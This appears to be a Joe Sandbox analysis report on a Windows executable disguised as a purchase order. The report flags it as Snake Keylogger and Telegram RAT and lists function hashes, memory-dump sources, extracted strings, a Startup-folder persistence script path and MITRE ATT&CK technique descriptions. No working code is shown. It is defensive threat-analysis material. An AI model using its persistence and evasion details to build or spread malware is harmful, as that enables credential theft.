Opcode ID: e8ca76052e8b0f85a20302345f1acd9b85683be0288054021782195404a30379
Instruction ID: 6543417c451abc08b8331904cba163a0edd5fafa7cb0b152c2995be532f9ce8e
Opcode Fuzzy Hash: e8ca76052e8b0f85a20302345f1acd9b85683be0288054021782195404a30379
Instruction Fuzzy Hash: 8A01BB71E11219DFCF58EFB9C804AAEBBF5BF48200F10856AD819E7254E7745A01CF91

Function 0271D449 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 752019f964594420329ea1b7d463f41716189c66c4971a1c67b4bbfe0a555cb6
Instruction ID: 29065d8fb71bff16d7eba5b308e64330d41b750dd106525afb424421fd3df8c6
Opcode Fuzzy Hash: 752019f964594420329ea1b7d463f41716189c66c4971a1c67b4bbfe0a555cb6
Instruction Fuzzy Hash: 41E0D834D44105EBD7189B5DAC0A7BEB3789B86301F405034DE05B3190DB706515CDA5

Function 0271DF79 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3adc9300fb67ee5ff7fb37f3a5f7b2e3e782ce9ec883737125a2158fbf7fd591
Instruction ID: 5044809636034ca863b2770216cc5528843e30902a6451ae27b6f79936748196
Opcode Fuzzy Hash: 3adc9300fb67ee5ff7fb37f3a5f7b2e3e782ce9ec883737125a2158fbf7fd591
Instruction Fuzzy Hash: 78E0D830D04204ABC7149B5DA8093BEB37DEF8B301F405020D225731E0CB74C614CD92

Function 02712010 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 552b2a0059d210ba948ccd1b0a13e11d680fb16580168e17628323bb59b7f14b
Instruction ID: 42e0fddfecf854b29fd320402b246d622bc62be85bff3787ac5fe69a31fe57b4
Opcode Fuzzy Hash: 552b2a0059d210ba948ccd1b0a13e11d680fb16580168e17628323bb59b7f14b
Instruction Fuzzy Hash: 44E06832D243550BCB11A77098060EDBF34EE92212F658272C02037042E720420BC391

Function 0271D4B4 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48aa3fadfcd1badcf5273e299b638b5e5bad64e6a8bd7eb3adf6863215027153
Instruction ID: 12e91558f59d8a0489d410979dcca5da389a179ce71f0a24ee4af9ffbe490a0c
Opcode Fuzzy Hash: 48aa3fadfcd1badcf5273e299b638b5e5bad64e6a8bd7eb3adf6863215027153
Instruction Fuzzy Hash: EDE0DFE2C081809BE7248BAA6826179BF34CDD720578460C7898AAB131D214E60ADF12

Function 0271D457 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63c21924e0c1461dc81aa826ea9bea35c044e116d721f4fcac77ae24a178143f
Instruction ID: d5feaffbbaca4745cf811e447f3cc094069efdca2d3e7a7994ed67dc93a819fd
Opcode Fuzzy Hash: 63c21924e0c1461dc81aa826ea9bea35c044e116d721f4fcac77ae24a178143f
Instruction Fuzzy Hash: 6AE08634D081449ADB149B6DB8197FEB7759BCA301F406529DA05721A4CB701519CE52

Function 0271DF17 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80587c8fd859aad70c2b7c798d8292bfe845d59e3a29cb91401dd91aa88d0f8
Instruction ID: dbc235aaf21454550e5363663f1c4a85666822d72d4d5d9db8b4905b904c4722
Opcode Fuzzy Hash: e80587c8fd859aad70c2b7c798d8292bfe845d59e3a29cb91401dd91aa88d0f8
Instruction Fuzzy Hash: 2FE08635D04144AEDB149FADA8187FEB775ABCB301F405425D615731A0CBB08619CE52

Function 02712020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da5d2d9c399be2fa4feca1847f838d6d624d3b23b4813c285de52507114cc4c
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: 2da5d2d9c399be2fa4feca1847f838d6d624d3b23b4813c285de52507114cc4c
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Function 02718258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: eb93615d58d795d59503dc51d120da5879a6e8cfb5741e777f207289ce8d529f
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 0AC0123320C5282AA729108E7C40AA7AB8CCAC12B4A290237F91CA3200A8429C8041AA

Function 0271A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c661407f9f70ce73974cc38e150c82e83503afaaa84b05c5d6737e42e8d15653
Instruction ID: b4f115d512537440cb75b4d0be7afb69a1e02d822114677ef4efd1bf899073a5
Opcode Fuzzy Hash: c661407f9f70ce73974cc38e150c82e83503afaaa84b05c5d6737e42e8d15653
Instruction Fuzzy Hash: A0D0677AB010089FCB049F98E8409DDB7B6FB9C221B448156E915A3260C6359961DB64

Function 02715EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00a7a0b3b8a51b084ca8c68adb5a37c628847e2dd501a75f0a21b54a36f10698
Instruction ID: 53b87ba7947caaee1686bd9ad909684d44d77a1c1fc1159a02506aa1df4eddf9
Opcode Fuzzy Hash: 00a7a0b3b8a51b084ca8c68adb5a37c628847e2dd501a75f0a21b54a36f10698
Instruction Fuzzy Hash: 2BD02B349243874FC311F770E8158153B156AC0208F4441F6F4050D51EEAA9290A4792

Function 0271FBEB Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ce0405ec1315f2cb496aa0766f93ac3f2f626ae92fbc654b32d8175c570657
Instruction ID: 71002e35bfdff0aa80f0f50fcd51dc2de099a88b3313a5a0d9fbefe54d17c133
Opcode Fuzzy Hash: b9ce0405ec1315f2cb496aa0766f93ac3f2f626ae92fbc654b32d8175c570657
Instruction Fuzzy Hash: 5AD048B8D0521C8BCB209FA8EA452A8B7B0EF8A301F0010A6D809B2200D6345AA49F12

Function 02715EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae71bc5c5991eb62bb6e7c0db7785e21217493f3e285561f2ee8877e3f809d51
Instruction ID: 8905b74ca2ba27f858db97a9a4b3be1ddfaec079aa838e76153935ed99381fa6
Opcode Fuzzy Hash: ae71bc5c5991eb62bb6e7c0db7785e21217493f3e285561f2ee8877e3f809d51
Instruction Fuzzy Hash: 02C0803453074A8FD611F7B1F945519371BB6C0301F4445B5F00A0E91DDEF97D495791

Non-executed Functions

Function 06242809 Relevance: 12.9, Strings: 10, Instructions: 420COMMON

Download Yara Rule

Strings

PHq, xrefs: 06242CF6
PHq, xrefs: 06242DD7
PHq, xrefs: 06242EE6
PHq, xrefs: 06242BFE
", xrefs: 06243087
PHq, xrefs: 06242BEA
Hq, xrefs: 06242869
PHq, xrefs: 06242CE2
PHq, xrefs: 06242DEB
PHq, xrefs: 06242ED2

Memory Dump Source

Source File: 0000000C.00000002.3719506755.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6240000_InstallUtil.jbxd

Similarity

API ID:
String ID: "$Hq$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
API String ID: 0-2204202469
Opcode ID: c2f28699df1d452b8dd7e682ab9add2be026271089b099cf7450276584967072
Instruction ID: b984f9705891a7a991e0318731fa7d5cf4c3abeacd55d29bd9345b3293ba27fc
Opcode Fuzzy Hash: c2f28699df1d452b8dd7e682ab9add2be026271089b099cf7450276584967072
Instruction Fuzzy Hash: E612E474E01218CFDB68DF65C984B9DBBB2BF89300F2080A9D809AB365DB755E85CF54

Function 06242807 Relevance: 12.9, Strings: 10, Instructions: 388COMMON

Download Yara Rule

Strings

PHq, xrefs: 06242CF6
PHq, xrefs: 06242DD7
PHq, xrefs: 06242EE6
PHq, xrefs: 06242BFE
", xrefs: 06243087
PHq, xrefs: 06242BEA
Hq, xrefs: 06242869
PHq, xrefs: 06242CE2
PHq, xrefs: 06242DEB
PHq, xrefs: 06242ED2

Memory Dump Source

Source File: 0000000C.00000002.3719506755.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6240000_InstallUtil.jbxd

Similarity

API ID:
String ID: "$Hq$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
API String ID: 0-2204202469
Opcode ID: fc19bd481366cd0e90605110b3c14e76e45f64f64731a00eb9d7d777500e901d
Instruction ID: 2d31844cb180b0508eae09e76fb363b6e09489ec4546319b217749506c28e330
Opcode Fuzzy Hash: fc19bd481366cd0e90605110b3c14e76e45f64f64731a00eb9d7d777500e901d
Instruction Fuzzy Hash: 9B12C274E01218CFEB68DF65C984B9DBBB2BF89300F2080A9D809A7364DB755E85CF54

Function 062428B0 Relevance: 11.7, Strings: 9, Instructions: 461COMMON

Download Yara Rule

Strings

PHq, xrefs: 06242CF6
PHq, xrefs: 06242DD7
PHq, xrefs: 06242EE6
PHq, xrefs: 06242BFE
", xrefs: 06243087
PHq, xrefs: 06242BEA
PHq, xrefs: 06242CE2
PHq, xrefs: 06242DEB
PHq, xrefs: 06242ED2

Memory Dump Source

Source File: 0000000C.00000002.3719506755.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6240000_InstallUtil.jbxd

Similarity

API ID:
String ID: "$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
API String ID: 0-4082700204
Opcode ID: 244f533a75aa0501ac4e26b97e69be9fea715db61936b2a873d79c811ecde833
Instruction ID: 05b9123c9d459332538757672af1a2cafe511628fa8ee217fafb364828543674
Opcode Fuzzy Hash: 244f533a75aa0501ac4e26b97e69be9fea715db61936b2a873d79c811ecde833
Instruction Fuzzy Hash: D9328074E11218CFDB68DF65C984B9DBBB2BF89304F2080A9D809A7361DB715E85CF54

Function 02716088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 02716094
\;q, xrefs: 027160BA
\;q, xrefs: 027160C6
\;q, xrefs: 0271609E

Memory Dump Source

Source File: 0000000C.00000002.3708916956.0000000002710000.00000040.00000800.00020000.00000000.sdmp, Offset: 02710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2710000_InstallUtil.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: 591859d7883dab287ad057c142e044d9f282f26466011b9168c6b206a8e9ec02
Instruction ID: 133670719838b5ee0aeb456844f632e8c3555d2418be1de887d5c487e56d8745
Opcode Fuzzy Hash: 591859d7883dab287ad057c142e044d9f282f26466011b9168c6b206a8e9ec02
Instruction Fuzzy Hash: 2B0144317101258FCB249A2DC444E2577EAAF886A571942BAE906DB3B4DB71DC41C750

Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003E51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.000000000322D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000004031000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTbqyxs.exe. vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1314551703.000000000684E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTbqyxs.exe. vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.00000000032C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000000.1239570749.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTbqyxs.exe. vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1295829976.000000000111E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1315811358.0000000006B80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1316425818.0000000006D40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLpmarogl.dll" vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLpmarogl.dll" vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1314841374.00000000068C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLpmarogl.dll" vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe, 00000000.00000002.1296947151.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PO_63738373663838____________________________________________________________________________.exe
Source: PO_63738373663838____________________________________________________________________________.exe	Binary or memory string: OriginalFilenameTbqyxs.exe. vs PO_63738373663838____________________________________________________________________________.exe

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO_63738373663838____________________________________________________________________________.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Keywords.exe

C:\Users\user\AppData\Roaming\Keywords.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Keywords.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
PO_63738373663838____________________________________________________________________________.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

